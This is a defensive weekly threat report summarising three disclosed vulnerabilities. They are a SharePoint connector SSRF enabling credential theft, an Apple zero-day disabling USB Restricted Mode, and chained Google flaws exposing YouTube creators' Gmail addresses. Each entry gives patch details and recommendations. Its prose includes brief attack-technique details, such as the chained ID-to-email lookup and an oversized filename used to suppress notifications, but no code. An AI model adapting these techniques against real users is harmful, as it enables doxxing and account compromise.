17.02.25 Threat Report

This week's Threat Report includes a critical Microsoft SharePoint Connector vulnerability, an Apple zero-day exploited in targeted attacks, and a Google flaw that exposed YouTube users' email addresses.

1. Microsoft SharePoint Connector Vulnerability: Credential Theft Risk

A severe server-side request forgery (SSRF) vulnerability (CVE-2024-49070) in Microsoft Power Platform’s SharePoint connector allowed attackers to steal user credentials and impersonate victims across multiple Microsoft services, including:

• Power Apps

• Power Automate

• Copilot Studio

• Copilot 365

This vulnerability posed a significant risk to organisations relying on SharePoint for data management and collaboration.

How the Attack Happened:

Researcher Dmitry Lozovoy discovered that insufficient input validation within the SharePoint connector enabled attackers to manipulate the custom value function, allowing them to:

✅ Execute unauthorised actions on behalf of victims.
✅ Access sensitive data, including user directories and document libraries.
✅ Escalate privileges within an organisation’s network.

Microsoft’s Response & Patch Details:

Microsoft patched the flaw in December 2024, classifying it as an Elevation of Privilege vulnerability. The affected systems include:

✅ SharePoint Server 2016, 2019, and Subscription Edition
✅ Power Platform services, including connectors for Power Apps and Automate

Recommendations:

🔹 Install the latest security updates.
🔹 Restrict Environment Maker and Basic User roles to trusted personnel.
🔹 Audit flows/apps for unusual external URL references.
🔹 Train employees on phishing risks and unauthorised consent requests.

2. Apple Zero-Day Vulnerability Exploited in Targeted Attacks

Apple has released iOS 18.3.1 and iPadOS 18.3.1 to fix a zero-day vulnerability (CVE-2025-24200) that allowed attackers to disable USB Restricted Mode on locked devices. The flaw was exploited in highly targeted and sophisticated attacks.

How the Attack Happened:

Apple’s USB Restricted Mode prevents unauthorised USB access to locked devices. However, an attacker with physical access could disable this security feature due to an authorisation issue in the Accessibility framework.

The vulnerability was discovered by Bill Marczak from The Citizen Lab at the University of Toronto’s Munk School.

Apple’s Response & Patch Details:

Apple addressed the issue by improving state management within the system. The fix applies to:

✅ iPhone XS and later models
✅ iPad Pro, iPad Air, iPad, and iPad mini models

Recommendations:

🔹 Update to iOS 18.3.1/iPadOS 18.3.1 immediately.
🔹 Enable USB Restricted Mode manually via Settings.
🔹 Restrict physical access to sensitive devices.
🔹 Use Mobile Threat Defence (MTD) solutions to detect potential attacks.

3. Google Flaws Allowed YouTube IDs to Reveal Gmail Addresses

Security researcher Brutecat uncovered two vulnerabilities in Google’s systems that exposed YouTube channel owners’ email addresses, violating Google’s privacy assurances.

How the Attack Happened:

By combining two exploits, Brutecat was able to convert obfuscated YouTube IDs (Gaia IDs) into Gmail addresses:

1️⃣ People API Abuse: Blocking a YouTube user revealed their Gaia ID (Google’s unified identity system).
2️⃣ Pixel Recorder Exploit: Sharing a recording via Pixel Recorder’s web app exposed the recipient’s email address in web request logs.

🔹 A Python script was used to prevent notifications by generating an excessively long filename (2.5 million characters).

Google’s Response & Patch Details:

Google initially classified the vulnerability as low risk, awarding $3,133 in its bug bounty program. However, recognising the high potential for exploitation, the company increased the bounty to $10,633 and patched the flaw.

Potential Risks:

⚠️ Targeted phishing attacks exploiting exposed Gmail addresses.
⚠️ Doxxing risks for YouTube creators and journalists.
⚠️ Credential stuffing attacks using email-password combinations.

Recommendations:

🔹 Review API security and limit ID-to-email mappings.
🔹 Strengthen multi-factor authentication (MFA) for high-risk accounts.
🔹 Educate employees on phishing risks and email exposure.
🔹 Monitor for API vulnerabilities and enforce strict access controls.